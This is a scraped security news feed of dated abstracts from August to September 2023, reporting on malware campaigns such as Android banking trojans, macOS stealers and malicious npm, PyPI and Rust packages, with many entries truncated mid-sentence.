An emerging Android banking trojan called Zanubis is now masquerading as a Peruvian government app to trick unsuspecting users into installing the malware. "Zanubis's main infection path is through impersonating legitimate Peruvian Android applications and then tricking the user into enabling the Accessibility permissions in order to take full control of the device," Kaspersky said in an analysis published last week. Zanubis, originally documented in August 2022, is the latest addition to a long list of Android banker malware targeting the Latin American (LATAM) region. Targets include more than 40 banks and financial entities in Peru. It's mainly known for abusing accessibility permissions on the infected device to display fake overlay screens atop the targeted apps in an attempt to steal credentials. It's also capable of harvesting contact data, the list of installed apps, and system metadata. Kaspersky said it observed recent samples of Zanubis in the w ... (The Hacker News)
September 29, 2023
Microsoft’s AI-Powered Bing Chat Ads May Lead Users to Malware-Distributing Sites Full Text
Abstract
Malicious ads served inside Microsoft Bing's artificial intelligence (AI) chatbot are being used to distribute malware when searching for popular tools. The findings come from Malwarebytes, which revealed that unsuspecting users can be tricked into visiting booby-trapped sites and installing malware directly from Bing Chat conversations. Introduced by Microsoft in February 2023, Bing Chat is an interactive search experience that's powered by OpenAI's large language model called GPT-4. A month later, the tech giant began exploring placing ads in the conversations. But the move has also opened the doors for threat actors who resort to malvertising tactics and propagate malware. "Ads can be inserted into a Bing Chat conversation in various ways," Jérôme Segura, director of threat intelligence at Malwarebytes, said. "One of those is when a user hovers over a link and an ad is displayed first before the organic result." In an example highligh ... (The Hacker News)
September 27, 2023
Newly Discovered ZenRAT Malware Targets Windows Users Full Text
Abstract
A new malware strain called ZenRAT has emerged in the wild to steal information from Windows systems. It was initially discovered on a website pretending to be associated with the open-source password manager Bitwarden. People should be wary of ads in search engine results as they remain a major dr ... (Cyware)
September 27, 2023
New ZenRAT Malware Targeting Windows Users via Fake Password Manager Software Full Text
Abstract
A new malware strain called ZenRAT has emerged in the wild that's distributed via bogus installation packages of the Bitwarden password manager. "The malware is specifically targeting Windows users and will redirect people using other hosts to a benign web page," enterprise security firm Proofpoint said in a technical report. "The malware is a modular remote access trojan (RAT) with information stealing capabilities." ZenRAT is hosted on fake websites pretending to be associated with Bitwarden, although it's uncertain as to how traffic is being directed to the domains. Such malware has been propagated via phishing, malvertising, or SEO poisoning attacks in the past. The payload (Bitwarden-Installer-version-2023-7-1.exe), downloaded from crazygameis[.]com, is a trojanized version of the standard Bitwarden installation package that contains a malicious .NET executable (ApplicationRuntimeMonitor.exe). A noteworthy aspect of the campaign is that users wh ... (The Hacker News)
September 26, 2023
Xenomorph Banking Trojan: A New Variant Targeting 35+ U.S. Financial Institutions Full Text
Abstract
An updated version of an Android banking trojan called Xenomorph has set its sights on more than 35 financial institutions in the U.S. The campaign, according to Dutch security firm ThreatFabric, leverages phishing web pages that are designed to entice victims into installing malicious Android apps that target a broader list of apps than its predecessors. Other prominent targeted countries include Spain, Canada, Italy, and Belgium. "This new list adds dozens of new overlays for institutions from the United States, Portugal, and multiple crypto wallets, following a trend that has been consistent amongst all banking malware families in the last year," the company said in an analysis published Monday. Xenomorph is a variant of another banker malware called Alien which first emerged in 2022. Later that year, the financial malware was propagated via a new dropper dubbed BugDrop, which bypassed security features in Android 13. A subsequent iter ... (The Hacker News)
September 25, 2023
Xenomorph Malware Returns to Strike Customers of Over 30 American Banks Full Text
Abstract
The Xenomorph malware family, known for its advanced capabilities and distribution campaigns, has resurfaced with new overlays targeting institutions and crypto wallets in the United States and Portugal. (Cyware)
September 23, 2023
Deadglyph: New Advanced Backdoor with Distinctive Malware Tactics Full Text
Abstract
Cybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign. "Deadglyph's architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly," ESET said in a new report shared with The Hacker News. "This combination is unusual because malware typically uses only one programming language for its components. This difference might indicate separate development of those two components while also taking advantage of unique features of the distinct programming languages they utilize." It's also suspected that the use of different programming languages is a deliberate tactic to hinder analysis, making it a lot more challenging to navigate and debug. Unlike other traditional backdoors of its kind, the commands are received from an actor-controlled server in the form of additi ... (The Hacker News)
September 22, 2023
New Variant of Banking Trojan BBTok Targets Over 40 Latin American Banks Full Text
Abstract
An active malware campaign targeting Latin America is dispensing a new variant of a banking trojan called BBTok, particularly to users in Brazil and Mexico. "The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number," Check Point said in research published this week. The payloads are generated by a custom server-side PowerShell script and are unique for each victim based on the operating system and country, while being delivered via phishing emails that leverage a variety of file types. BBTok is a Windows-based banking malware that first surfaced in 2020. It's equipped with features that run the typical trojan gamut, allowing it to enumerate and kill processes, issue remote commands, manipulate the keyboard, and serve fake login pages for banks operating in the two countries. The attack cha ... (The Hacker News)
September 21, 2023
Researchers Raise Red Flag on P2PInfect Malware with 600x Activity Surge Full Text
Abstract
The peer-to-peer (P2P) worm known as P2PInfect has witnessed a surge in activity since late August 2023, with a 600x jump between September 12 and 19, 2023. "This increase in P2PInfect traffic has coincided with a growing number of variants seen in the wild, suggesting that the malware's developers are operating at an extremely high development cadence," Cado Security researcher Matt Muir said in a report published Wednesday. A majority of the compromises have been reported in China, the U.S., Germany, the U.K., Singapore, Hong Kong, and Japan. P2PInfect first came to light in July 2023 for its ability to breach poorly secured Redis instances. The threat actors behind the campaign have since resorted to different approaches for initial access, including the abuse of the database's replication feature to deliver the malware. Cado Security said it has observed an increase in initial access events attributable to P2PInfect in which the Redis SLAVEOF command ... (The Hacker News)
September 20, 2023
Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys Full Text
Abstract
Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server. Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core, @dynamic-form-components/mui, @dynamic-form-components/shineout, @expue/app, @fixedwidthtable/fixedwidthtable, @soc-fe/use, @spgy/eslint-plugin-spgy-fe, @virtualsearchtable/virtualsearchtable, and shineouts. "These packages [...] attempt to impersonate JavaScript libraries and components, such as ESLint plugins and TypeScript SDK tools," the software supply chain security firm said. "But, upon installation, multiple versions of the packages were seen running obfuscated code to collect and siphon sensitive files from the target machine." Along with Kubernetes config and SSH ke ... (The Hacker News)
September 20, 2023
Malicious NPM Packages Caught Exfiltrating Kubernetes Config, SSH Keys Full Text
Abstract
The malicious software packages impersonate legitimate JavaScript libraries and components, but upon installation, they run obfuscated code to collect and siphon sensitive files. (Cyware)
September 19, 2023
Inside the Code of a New XWorm Variant Full Text
Abstract
XWorm is a relatively new representative of the remote access trojan cohort that has already earned its spot among the most persistent threats across the globe. Since 2022, when it was first observed by researchers, it has undergone a number of major updates that have significantly enhanced its functionality and solidified its staying power. The analyst team at ANY.RUN came across the newest version of the malware and could not refuse the opportunity of taking it apart to examine XWorm's mechanics and configuration. Here is how they did it and what they found. The XWorm sample's source: The sample in question was discovered in ANY.RUN's database of malware, a repository containing detailed analysis reports on all files and links that have been uploaded by users of the sandbox in public mode. A quick look at the results of the analysis revealed that the sample was initially distributed via MediaFire, a file-hosting service. The malware was packaged in a RAR archive and p ... (The Hacker News)
September 18, 2023
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement Full Text
Abstract
Earth Lusca, a China-linked threat actor, has developed a Linux variant of the backdoor malware SprySOCKS, which originated from the open-source Windows backdoor Trochilus, indicating their continued active operations and expansion. (Cyware)
September 18, 2023
Hook: New Android Banking Trojan That Expands on ERMAC’s Legacy Full Text
Abstract
A new analysis of the Android banking trojan known as Hook has revealed that it's based on its predecessor called ERMAC. "The ERMAC source code was used as a base for Hook," NCC Group security researchers Joshua Kamp and Alberto Segura said in a technical analysis published last week. "All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical." Hook was first documented by ThreatFabric in January 2023, describing it as an "ERMAC fork" that's offered for sale for $7,000 per month. Both strains are the work of a malware author called DukeEugene. That said, Hook expands on ERMAC's functionalities with more capabilities, supporting as many as 38 additional commands when compared to the latter. ERMAC's core features are designed to send SMS messages, display a phishing window on top of a legitimate app, e ... (The Hacker News)
September 15, 2023
New Python NodeStealer Goes Beyond Facebook Credentials, Now Stealing All Browser Cookies and Login Credentials Full Text
Abstract
The campaign uses batch files distributed via Facebook messages, utilizing images of defective products as bait, and stealing credentials and cookies from multiple browsers, not just Facebook, increasing the risk of targeted attacks. (Cyware)
September 15, 2023
NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers Full Text
Abstract
An ongoing campaign is targeting Facebook Business accounts with bogus messages to harvest victims' credentials using a variant of the Python-based NodeStealer and potentially take over their accounts for follow-on malicious activities. "The attacks are reaching victims mainly in Southern Europe and North America across different segments, led by the manufacturing services and technology sectors," Netskope Threat Labs researcher Jan Michael said in an analysis published Thursday. First documented by Meta in May 2023, NodeStealer originated as a JavaScript malware capable of pilfering cookies and passwords from web browsers to compromise Facebook, Gmail, and Outlook accounts. Palo Alto Networks Unit 42, last month, revealed a separate attack wave that took place in December 2022 using a Python version of the malware, with select iterations also designed to conduct cryptocurrency theft. The latest findings from Netskope suggest the Vietnamese threat actors be ... (The Hacker News)
September 15, 2023
LokiBot Information Stealer Packs Fresh Infection Strategies Full Text
Abstract
The malware targets Microsoft users and steals various types of data, including email credentials, payment card information, and cryptocurrency passwords. It is particularly appealing to less technically skilled individuals due to its ease of use. (Cyware)
September 14, 2023
Exiled Russian Journalist’s Phone Hacked With Pegasus Spyware Full Text
Abstract
The notorious spyware was reportedly installed on the iPhone of Galina Timchenko, owner of the Russian independent media outlet Meduza, while she was in Berlin for a private conference with other Russian independent journalists living in exile. (Cyware)
September 14, 2023
RedLine and Vidar Stealers Abuse EV Certificates, Shift to Ransomware Payloads Full Text
Abstract
Threat actors are using EV code signing certificates to distribute both information-stealing malware and ransomware, indicating a streamlining of operations and the need for stronger security measures. (Cyware)
September 13, 2023
Newly Discovered MetaStealer Malware Targets macOS Users Full Text
Abstract
A new MetaStealer malware has surfaced in the wild, targeting macOS business users. Written in Golang, the malware is distributed via social engineering tactics, where attackers pose as fake design clients and lure victims into executing malicious payloads. Apple's XProtect update v2170 contains a ... (Cyware)
September 12, 2023
OriginBotnet, RedLine Clipper, and AgentTesla Distributed Via Phishing Emails Full Text
Abstract
A dark cloud of threats hovers over Windows users as security researchers uncovered a phishing campaign delivering Agent Tesla, OriginBotnet, and RedLine Clipper via maldocs. Attackers can extract a wide range of data from compromised systems, such as credentials, crypto wallet data, and other sens ... (Cyware)
September 12, 2023
Beware: MetaStealer Malware Targets Apple macOS in Recent Attacks Full Text
Abstract
A new information stealer malware called MetaStealer has set its sights on Apple macOS, making it the latest in a growing list of stealer families focused on the operating system after Stealer, Pureland, Atomic Stealer, and Realst. "Threat actors are proactively targeting macOS businesses by posing as fake clients in order to socially engineer victims into launching malicious payloads," SentinelOne security researcher Phil Stokes said in a Monday analysis. In these attacks, MetaStealer is distributed in the form of rogue application bundles in the disk image format (DMG), with targets approached through threat actors posing as prospective design clients in order to share a password-protected ZIP archive containing the DMG file. Other instances have involved the malware masquerading as Adobe files or installers for Adobe Photoshop. Evidence gathered so far shows that MetaStealer artifacts began appearing in the wild in March 2023. The most recent sample was uploade ... (The Hacker News)
September 12, 2023
New Family of Obfuscated Go Info-stealers ‘MetaStealer’ Spread in Targeted Attacks Full Text
Abstract
Unlike other recent macOS malware, MetaStealer relies on social engineering tactics to persuade victims to launch malicious payloads, often disguised as legitimate files or software. (Cyware)
September 11, 2023
New HijackLoader Malware Used to Distribute Various Malware Families Full Text
Abstract
A new malware loader known as HijackLoader has gained popularity among cybercriminals for distributing various payloads, including DanaBot, SystemBC, and RedLine Stealer. HijackLoader uses a modular architecture that facilitates threat actors to perform code injection and execution. Organizations m ... (Cyware)
September 11, 2023
New HijackLoader Modular Malware Loader Making Waves in the Cybercrime World Full Text
Abstract
A new malware loader called HijackLoader is gaining traction among the cybercriminal community to deliver various payloads such as DanaBot, SystemBC, and RedLine Stealer. "Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler ThreatLabz researcher Nikolaos Pantazopoulos said. First observed by the company in July 2023, the malware employs a number of techniques to fly under the radar. This involves using syscalls to evade monitoring from security solutions, monitoring processes associated with security software based on an embedded blocklist, and putting off code execution by as much as 40 seconds at different stages. The exact initial access vector used to infiltrate targets is currently not known. The anti-analysis aspects notwithstanding, the loader packs in a main instrumentation module that ... (The Hacker News)
September 09, 2023
Millions Infected by Spyware Hidden in Fake Telegram Apps on Google Play Full Text
Abstract
Spyware masquerading as modified versions of Telegram has been spotted in the Google Play Store that's designed to harvest sensitive information from compromised Android devices. According to Kaspersky security researcher Igor Golovin, the apps come with nefarious features to capture and exfiltrate names, user IDs, contacts, phone numbers, and chat messages to an actor-controlled server. The activity has been codenamed Evil Telegram by the Russian cybersecurity company. The apps have been collectively downloaded millions of times before they were taken down by Google. Their details are as follows: 電報,紙飛機-TG繁體中文版 or 電報,小飛機-TG繁體中文版 (org.telegram.messenger.wab), 10 million+ downloads; TG繁體中文版-電報,紙飛機 (org.telegram.messenger.wab), 50,000+ downloads; 电报,纸飞机-TG简体中文版 (org.telegram.messenger.wob), 50,000+ downloads; 电报,纸飞机-TG简体中文版 (org.tgcn.messenger.wob), 10,000+ downloads; ئۇيغۇر تىلى TG - تېلېگرامما (org.telegram.messenger.wcb), 100+ downloads. The last app on the list tran ... (The Hacker News)
September 9, 2023
Weaponized Windows Installers Target Graphic Designers in Crypto Heist Full Text
Abstract
Attackers execute malicious scripts through a feature of the installer called Custom Action, dropping several payloads — including the M3_Mini_Rat client stub backdoor, Ethereum mining malware PhoenixMiner, and multi-coin mining threat lolMiner. (Cyware)
September 8, 2023
New BlueShell Malware Attacks Windows, Linux, and Mac Full Text
Abstract
The BlueShell malware was found being used by various threat actors to target systems running Windows, Linux, and other operating systems in Korea and Thailand. The Dalbit Group, a China-based threat group, has been identified as using a customized version of BlueShell. To mitigate such threats, or ... (Cyware)
September 8, 2023
New Atomic Stealer Variant Used in a Malvertising Campaign Full Text
Abstract
Researchers at Malwarebytes have identified a new version of the Atomic Stealer macOS malware that employs a technique to bypass the operating system's Gatekeeper security feature. The malware masquerades as the popular TradingView platform. It is important to deploy an antivirus with real-time pro ... (Cyware)
September 7, 2023
Mac Users Targeted in New Malvertising Campaign Delivering Atomic Stealer Full Text
Abstract
Attackers are using phishing sites and search engine ads to trick victims into downloading the malware, highlighting the importance of verifying the authenticity of downloaded programs. (Cyware)
September 6, 2023
Threat Actors Target NPM, PyPI, and RubyGems Developers Full Text
Abstract
A new cyber campaign has emerged, with threat actors uploading malicious packages to PyPI, NPM, and RubyGems repositories, posing a significant threat to macOS user data. The malicious packages would collect system information and exfiltrate it to attacker-controlled servers. Security firm Phylum i ... (Cyware)
September 6, 2023
Bogus URL Shorteners Go Mobile-Only in AdSense Fraud Campaign Full Text
Abstract
The attackers have implemented multiple layers of defense to protect their Google AdSense accounts, including JavaScript execution, mobile user agent checks, user interaction requirements, and server-side user agent checks. (Cyware)
September 6, 2023
New Agent Tesla Variant Being Spread by Specially Crafted Excel Document Full Text
Abstract
A new variant of the Agent Tesla malware is spreading through a phishing campaign, exploiting the CVE-2017-11882/CVE-2018-0802 vulnerability to gain access to victims' devices and steal sensitive information. (Cyware)
September 6, 2023
New Chae$ 4 Strain Targets Financial and Logistics Customers Full Text
Abstract
A reworked variant of the Chaes malware, Chae$ 4, is causing havoc in the banking and logistics sectors with significant overhauls. It has been completely rewritten in Python to bypass traditional security defenses and improve communication protocols. It's essential to regularly update and pa ... (Cyware)
September 05, 2023
New BLISTER Malware Update Fuelling Stealthy Network Infiltration Full Text
Abstract
An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic. "New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments," Elastic Security Labs researchers Salim Bitam and Daniel Stepanic said in a technical report published late last month. BLISTER was first uncovered by the company in December 2021 acting as a conduit to distribute Cobalt Strike and BitRAT payloads on compromised systems. The use of the malware alongside SocGholish (aka FakeUpdates), a JavaScript-based downloader malware, to deliver Mythic was previously disclosed by Palo Alto Networks Unit 42 in July 2023. In these attacks, BLISTER is embedded within a legitimate VLC Media Player library in an attempt to get around security software and infiltrate victim environments. Both SocGholish and ... (The Hacker News)
September 5, 2023
New Chaes Malware Variant Targeting Financial and Logistics Customers Full Text
Abstract
This new variant, primarily targeting logistics and financial sectors, has undergone significant changes, including being rewritten in Python, enhanced communication protocols, and new modules. (Cyware)
September 05, 2023
New Python Variant of Chaes Malware Targets Banking and Logistics Industries Full Text
Abstract
Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes. "It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol," Morphisec said in a new detailed technical write-up shared with The Hacker News. Chaes, which first emerged in 2020, is known to target e-commerce customers in Latin America, particularly Brazil, to steal sensitive financial information. A subsequent analysis from Avast in early 2022 found that the threat actors behind the operation, who call themselves Lucifer, had breached more than 800 WordPress websites to deliver Chaes to users of Banco do Brasil, Loja Integrada, Mercado Bitcoin, Mercado Livre, and Mercado Pago. Further updates were detected in December 2022, when Brazilian cybersecurity company Tempest Security Intelligence uncovered the mal ... (The Hacker News)
September 5, 2023
Unraveling EternalBlue: Inside the WannaCry’s Enabler Full Text
Abstract
EternalBlue exploits a vulnerability in the Microsoft implementation of the Server Message Block (SMB) Protocol. This dupes an unpatched Windows machine into allowing illegitimate data packets into the legitimate network.Cyware
September 04, 2023
Beware of MalDoc in PDF: A New Polyglot Attack Allowing Attackers to Evade Antivirus Full Text
Abstract
Cybersecurity researchers have called attention to a new antivirus evasion technique that involves embedding a malicious Microsoft Word file into a PDF file. The sneaky method, dubbed MalDoc in PDF by JPCERT/CC, is said to have been employed in an in-the-wild attack in July 2023. "A file created with MalDoc in PDF can be opened in Word even though it has magic numbers and file structure of PDF," researchers Yuma Masubuchi and Kota Kino said. "If the file has a configured macro, by opening it in Word, VBS runs and performs malicious behaviors." Such specially crafted files are called polyglots because they are a valid instance of multiple different file types, in this case both PDF and Word (DOC). This entails adding an MHT file created in Word, with a macro attached, after the PDF file object. The end result is a valid PDF file that can also be opened in the Word application. Put differently, the PDF document embeds within itself a Word document with a VBThe Hacker News
September 1, 2023 – Breach
Data Breach Could Affect More Than 100,000 in Pima County Full Text
Abstract
More than 100,000 Pima County residents could be affected by a nationwide data breach that affected the company that handled COVID-19 case investigations and contact tracing here, officials say.Cyware
September 01, 2023
Russian State-Backed ‘Infamous Chisel’ Android Malware Targets Ukrainian Military Full Text
Abstract
Cybersecurity and intelligence agencies from Australia, Canada, New Zealand, the U.K., and the U.S. on Thursday disclosed details of a mobile malware strain targeting Android devices used by the Ukrainian military. The malicious software, dubbed Infamous Chisel and attributed to a Russian state-sponsored actor called Sandworm, has capabilities to "enable unauthorized access to compromised devices, scan files, monitor traffic, and periodically steal sensitive information." Some aspects of the malware were uncovered by the Security Service of Ukraine (SBU) earlier in August, highlighting unsuccessful attempts on part of the adversary to penetrate Ukrainian military networks and gather valuable intelligence. It's said that Russian forces captured tablets used by Ukraine on the battlefield, using them as a foothold to remotely disseminate the malware to other devices by using the Android Debug Bridge (ADB) command-line tool. Sandworm, also known by the names FROZENBARENTS, IrThe Hacker News
August 31, 2023
SapphireStealer Malware: A Gateway to Espionage and Ransomware Operations Full Text
Abstract
An open-source .NET-based information stealer malware dubbed SapphireStealer is being used by multiple entities to enhance its capabilities and spawn their own bespoke variants. "Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion," Cisco Talos researcher Edmund Brumaghin said in a report shared with The Hacker News. An entire ecosystem has developed over time that allows both financially motivated and nation-state actors to use services from purveyors of stealer malware to carry out various kinds of attacks. Viewed in that light, such malware not only represents an evolution of the cybercrime-as-a-service (CaaS) model, it also gives other threat actors a way to monetize the stolen data to distribute ransomware, conduct data theft, and other maliciouThe Hacker News
August 31, 2023
North Korean Hackers Deploy New Malicious Python Packages in PyPI Repository Full Text
Abstract
Three additional rogue Python packages have been discovered in the Package Index (PyPI) repository as part of an ongoing malicious software supply chain campaign called VMConnect, with signs pointing to the involvement of North Korean state-sponsored threat actors. The findings come from ReversingLabs, which detected the packages tablediter, request-plus, and requestspro. First disclosed at the start of the month by the company and Sonatype, VMConnect refers to a collection of Python packages that mimic popular open-source Python tools to download an unknown second-stage malware. The latest tranche is no different, with ReversingLabs noting that the bad actors are disguising their packages and making them appear trustworthy by using typosquatting techniques to impersonate prettytable and requests and confuse developers. The nefarious code within tablediter is designed to run in an endless execution loop in which a remote server is polled periodically to retrieve and executeThe Hacker News
August 31, 2023
BadBazaar Espionage Tool Targets Android Users Full Text
Abstract
ESET discovered two active campaigns distributing trojanized Signal and Telegram apps that aim to exfiltrate user data and spy on victims' communications. They have been spreading the BadBazaar Android spyware. Mitigation includes cautious app selection, avoiding suspicious sources, and maintaining ...Cyware
August 30, 2023
MMRat Android Trojan Executes Remote Financial Fraud Through Accessibility Feature Full Text
Abstract
A previously undocumented Android banking trojan dubbed MMRat has been observed targeting mobile users in Southeast Asia since late June 2023 to remotely commandeer the devices and perform financial fraud. "The malware, named after its distinctive package name com.mm.user, can capture user input and screen content, and can also remotely control victim devices through various techniques, enabling its operators to carry out bank fraud on the victim's device," Trend Micro said. What makes MMRat stand apart from others of its kind is the use of a customized command-and-control (C2) protocol based on protocol buffers (aka protobuf) to efficiently transfer large volumes of data from compromised handsets, demonstrating the growing sophistication of Android malware. Possible targets based on the language used in the phishing pages include Indonesia, Vietnam, Singapore, and the Philippines. The entry point of the attacks is a network of phishing sites that mimic officiThe Hacker News
August 30, 2023
China-Linked BadBazaar Android Spyware Targeting Signal and Telegram Users Full Text
Abstract
Cybersecurity researchers have discovered malicious Android apps for Signal and Telegram distributed via the Google Play Store and Samsung Galaxy Store that are engineered to deliver the BadBazaar spyware on infected devices. Slovakian company ESET attributed the campaign to a China-linked actor called GREF. "Most likely active since July 2020 and since July 2022, respectively, the campaigns have distributed the Android BadBazaar espionage code through the Google Play store, Samsung Galaxy Store, and dedicated websites representing the malicious apps Signal Plus Messenger and FlyGram," security researcher Lukáš Štefanko said in a new report shared with The Hacker News. Victims have been primarily detected in Germany, Poland, and the U.S., followed by Ukraine, Australia, Brazil, Denmark, Congo-Kinshasa, Hong Kong, Hungary, Lithuania, the Netherlands, Portugal, Singapore, Spain, and Yemen. BadBazaar was first documented by Lookout in November 2022 as targeting the UThe Hacker News
August 30, 2023
Malicious npm Packages Aim to Target Developers for Source Code Theft Full Text
Abstract
An unknown threat actor is leveraging malicious npm packages to target developers with an aim to steal source code and configuration files from victim machines, a sign of how threats lurk consistently in open-source repositories. "The threat actor behind this campaign has been linked to malicious activity dating back to 2021," software supply chain security firm Checkmarx said in a report shared with The Hacker News. "Since then, they have continuously published malicious packages." The latest report is a continuation of the same campaign that Phylum disclosed at the start of the month in which a number of npm modules were engineered to exfiltrate valuable information to a remote server. The packages, by design, are configured to execute immediately post-installation by means of a postinstall hook defined in the package.json file. It triggers the launch of preinstall.js, which spawns index.js to capture the system metadata as well as harvest source code andThe Hacker News
August 29, 2023
DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates Full Text
Abstract
A new malspam campaign has been observed deploying an off-the-shelf malware called DarkGate. "The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates," Telekom Security said in a report published last week. The latest report builds on recent findings from security researcher Igal Lytzki, who detailed a "high volume campaign" that leverages hijacked email threads to trick recipients into downloading the malware. The attack commences with a phishing URL that, when clicked, passes through a traffic direction system (TDS) to take the victim to an MSI payload subject to certain conditions. This includes the presence of a refresh header in the HTTP response. Opening the MSI file triggers a multi-stage process that incorporates an AutoIt script to execute shellcode that acts as a conduit to decrypt and launch DarkGate via a crypteThe Hacker News
August 29, 2023
Android Banking Trojan MMRat Carries Out Bank Fraud via Fake App Stores Full Text
Abstract
MMRat uses customized command-and-control protocols and remains undetected on VirusTotal, highlighting its ability to evade detection and exploit large volumes of data transfer.Cyware
August 28, 2023
MalDoc in PDFs: Hiding malicious Word docs in PDF files Full Text
Abstract
Japan's computer emergency response team (JPCERT) is sharing a new 'MalDoc in PDF' attack detected in July 2023 that bypasses detection by embedding malicious Word files into PDFs.BleepingComputer
August 28, 2023
Developers Beware: Malicious Rust Libraries Caught Transmitting OS Info to Telegram Channel Full Text
Abstract
In yet another sign that developers continue to be targets of software supply chain attacks, a number of malicious packages have been discovered on the Rust programming language's crate registry. The libraries, uploaded between August 14 and 16, 2023, were published by a user named "amaperf," Phylum said in a report published last week. The names of the packages, now taken down, are as follows: postgress, if-cfg, xrvrv, serd, oncecell, lazystatic, and envlogger. It's not clear what the end goal of the campaign was, but the suspicious modules were found to harbor functionalities to capture the operating system information (i.e., Windows, Linux, macOS, or Unknown) and transmit the data to a hard-coded Telegram channel via the messaging platform's API. This suggests that the campaign may have been in its early stages and that the threat actor may have been casting a wide net to compromise as many developer machines as possible to deliver rogue updates with impThe Hacker News
August 26, 2023
The Three Malware Loaders Behind 80% of Incidents Full Text
Abstract
QakBot, SocGholish, and Raspberry Robin are the most prevalent malware loaders causing havoc for security teams, with QakBot being the most versatile and persistent threat.Cyware
August 24, 2023
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware Full Text
Abstract
Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. Persistence is achieved by means of a shortcut that's added to the Windows Startup folder.Cyware
August 24, 2023
Lazarus Group Exploits ManageEngine Vulnerability to Deploy QuiteRAT Full Text
Abstract
QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size.Cyware
August 24, 2023
New “Whiffy Recon” Malware Triangulates Infected Device Location via Wi-Fi Every Minute Full Text
Abstract
The SmokeLoader malware is being used to deliver a new Wi-Fi scanning malware strain called Whiffy Recon on compromised Windows machines. "The new malware strain has only one operation. Every 60 seconds it triangulates the infected systems' positions by scanning nearby Wi-Fi access points as a data point for Google's geolocation API," Secureworks Counter Threat Unit (CTU) said in a statement shared with The Hacker News. "The location returned by Google's Geolocation API is then sent back to the adversary." SmokeLoader, as the name implies, is a loader malware whose sole purpose is to drop additional payloads onto a host. Since 2014, the malware has been offered for sale to Russian-based threat actors. It's traditionally distributed via phishing emails. Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. It's worth noting that thThe Hacker News
August 23, 2023
Over a Dozen Malicious npm Packages Target Roblox Game Developers Full Text
Abstract
More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called Luna Token Grabber on systems belonging to Roblox developers. The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js, an API wrapper that's used to create scripts that interact with the Roblox gaming platform. The software supply chain security company described the activity as a "replay of an attack uncovered two years ago" in October 2021. "The malicious packages [...] reproduce code from the legitimate noblox.js package but add malicious, information-stealing functions," software threat researcher Lucija Valentić said in a Tuesday analysis. The packages were cumulatively downloaded 963 times before they were taken down. The names of the rogue packages are as follows - noblox.js-vThe Hacker News
August 22, 2023
Thousands of Android Malware Apps Use Stealthy APKs to Bypass Security Full Text
Abstract
Threat actors are reportedly exploiting APK files that employ unknown or unsupported compression methods to bypass malware analysis, warned cybersecurity firm Zimperium. The approach hinders decompilation efforts while still enabling installation on Android devices running OS versions above Android ...Cyware
August 22, 2023
New Variant of XLoader macOS Malware Disguised as ‘OfficeNote’ Productivity App Full Text
Abstract
A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote." "The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)." XLoader, first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file. "Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE withThe Hacker News
August 21, 2023
HiatusRAT Returns after a Hiatus in a Fresh Wave of Attacks Full Text
Abstract
The HiatusRAT malware group reemerged to target Taiwan-based organizations and a U.S. military procurement system allegedly to snoop on military contracts. The audacity of threat actors is evident in their disregard for previous disclosures and their minimal efforts to change their payload servers. ...Cyware
August 21, 2023
This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers Full Text
Abstract
Threat actors are leveraging access to malware-infected Windows and macOS machines to deliver a proxy server application and use them as exit nodes to reroute proxy requests. According to AT&T Alien Labs, the unnamed company that offers the proxy service operates more than 400,000 proxy exit nodes, although it's not immediately clear how many of them were co-opted by malware installed on infected machines without user knowledge and interaction. "Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device," the cybersecurity company said it found evidence where "malware writers are installing the proxy silently in infected systems." Multiple malware families have been observed delivering the proxy to users searching for cracked software and games. The proxy software, written in the Go programming language, is capable of targeting both Windows and macOS, with the former capable oThe Hacker News
August 21, 2023
